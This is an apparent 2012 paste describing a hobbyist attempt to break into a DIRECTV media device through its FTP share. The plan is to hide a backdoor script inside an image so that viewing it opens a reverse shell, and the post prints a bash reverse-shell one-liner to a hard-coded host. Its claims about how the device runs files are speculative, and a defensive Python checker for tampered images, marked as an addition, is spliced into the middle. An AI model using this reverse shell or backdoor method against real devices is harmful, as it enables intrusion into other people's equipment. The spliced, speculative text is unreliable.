
[TV Hacking] DIRECT - Remote Keyboard - Apps - Hex00010

By: Hex00010 on Jun 20th, 2012
Re-linking all of my old 'guest' pastebins to one main account so I don't have to search for all of them through Google.

Main PasteBin Link -> http://pastebin.com/VDcSTxdK
-------------------------------------------------------------------------------------------------------

[TV Hacking] DIRECTV

This is an exploitation method to gain access to DIRECTV's device. In the Network and Sharing Center it is defined as DIRECTV server and media.

If you can understand everything I say below and can also help in the development of this, it would be much appreciated.

Thanks

http://[ SITE  TAKEN DOWN ]
-------------------------------------------------------------------------------------------------------

Hi guys, in light of certain stuff that has happened to me in the past, I am auditing my TV for certain reasons. In doing so, I'm going to just talk about my adventure in hacking the TV and provide what all I did, what happened, etc.

First things first:

DIRECTV Media Share - requires Media Sharing open on the network.

My auditing report may be different from yours, as I am targeting something specific.

DIRECTV allows external applications to be run on the device, such as Chrome, Netflix, etc.

My main target here is Netflix. What am I wanting to do?

I'm wanting to log all connections that are being sent out of and into the device.

Now, what does DIRECTV have open?

Port 5222
Port 2121 - FTP port --- version uses OFTP

OS: Linux

Hacking Methods:

The first thing I want to do is see if I can output data to the TV screen. I'm trying to look up more information on how the applications are programmed, to see if I can just use the API for printing messages, include it in a script, and see if it could execute on the screen.

Steps to do such:

1. We know that DIRECTV executes and writes data to files almost 24x7. We are given FTP access; however, it is using OFTP.

OFTP runs as non-root and is protected from system root commands; it also prevents viewing the whole directory or directories.

So what do we do now?

Well, we know that the service is being run as non-root, and we know that the folder structure is:

Android
Data
Videos
Pictures
etc.

Well, if we were to browse to the TV, go to My Pictures or Videos, and see pictures, what does that tell you?

1. We can force the system to execute a script from the FTP service as root.

Think about it.

We browse on the TV screen.
Go to Pictures.

------
While at the computer, you somehow find a way to bind data to an image, video, etc., and you place it on the FTP server.
--------

Now that you're in the Pictures screen, you see your new image.

You then select it.

What happens?

DIRECTV executes the file - we also bound a backdoor to it.

What exactly did this backdoor have in it?

Well, we know that the Linux kernel being used is Linux 2.6.17 - 2.6.36.

We also know that DIRECTV uses Silverlight from Microsoft, so we at least know it is using some standard Microsoft library/include files.

So we do have the possibility of creating a TCP connection.

We also know that it is using Linux.

And what does Linux have that we all like as hackers?

The simple Back-Connect Reverse HTTP Send 1 Request

By using the :)

{bash -i >& /dev/tcp/10.0.0.1/8081 0>&1} #8080 is already in use - also I think this device runs WinRM; it also has an xmpp-client as a service for port 5222 - still looking into that

So we add a .file-name (in reality it is SH/BASH, etc.)

Bind the file to the picture - now remember, we have a reverse back-connect going on.

After DIRECTV loads the image on screen, you now have a Reverse Connection.
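
A defensive check for the scenario described above (data bound to an image and placed on the media share), as an added example that is not part of the original paste: it inspects files that carry an image extension for non-image content and for bytes stored after the image's end marker. The function names, the extension table and the sample bytes are assumptions constructed for illustration.

```python
import os

IMAGE_EXTS = {".jpg": "jpeg", ".jpeg": "jpeg", ".png": "png"}  # assumed table
PNG_SIG = b"\x89PNG\r\n\x1a\n"
IN_SCAN = {0x00, *range(0xD0, 0xD8)}  # stuffed byte / RSTn: part of scan data

def png_end(data):  # offset just past IEND, or None if the chunk chain is broken
    pos = len(PNG_SIG)
    while pos + 12 <= len(data):
        length = int.from_bytes(data[pos:pos + 4], "big")
        is_iend = data[pos + 4:pos + 8] == b"IEND"
        pos += 12 + length                 # length, type, body, CRC
        if is_iend:
            return pos if pos <= len(data) else None
    return None

def jpeg_end(data):  # offset just past EOI, or None if the marker chain is broken
    pos = 2                                # skip SOI
    while pos + 2 <= len(data) and data[pos] == 0xFF:
        m = data[pos + 1]
        if m == 0xD9:                      # EOI
            return pos + 2
        if m in (0xFF, 0x01) or 0xD0 <= m <= 0xD7:
            pos += 1 if m == 0xFF else 2   # fill byte, or marker with no length
            continue
        pos += 2 + int.from_bytes(data[pos + 2:pos + 4], "big")  # segment length
        while m == 0xDA and pos + 1 < len(data) and not (
                data[pos] == 0xFF and data[pos + 1] not in IN_SCAN):
            pos += 1                       # skip entropy-coded scan data
    return None

def inspect_media(name, data):
    """Findings for one file from the share; an empty list means clean."""
    expected = IMAGE_EXTS.get(os.path.splitext(name.lower())[1])
    if expected is None:
        return []
    is_png = data.startswith(PNG_SIG)
    if not is_png and not data.startswith(b"\xff\xd8\xff"):
        return ["image extension but content is not an image"]
    kind, end = ("png", png_end(data)) if is_png else ("jpeg", jpeg_end(data))
    findings = ["extension/content mismatch"] if kind != expected else []
    if end is None:
        findings.append("truncated or malformed image")
    elif end < len(data):
        findings.append(f"{len(data) - end} bytes after end of image")
    return findings

# Constructed samples: minimal marker/chunk chains, not renderable pictures.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0\x00\x04JF\xff\xda\x00\x02\x12\xff\x00\x34\xff\xd9"
SAMPLE_PNG = PNG_SIG + b"\x00\x00\x00\x00IEND\xaeB`\x82"
```

Some cameras and phones append benign trailer data after the end marker, so a finding is a reason to look at the file, not proof of tampering.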

What next?

Rooting the OS

We know that the OS is Linux 2.6.17 - 2.6.36.

Now here is the part I'm going to have to do more research on, as it's not just like simply rooting your ordinary Linux system; it requires much more than just that.

However, I will update this thread as I go along.

If you guys have any suggestions or advice that can help, just tell me.

Will be updated soon.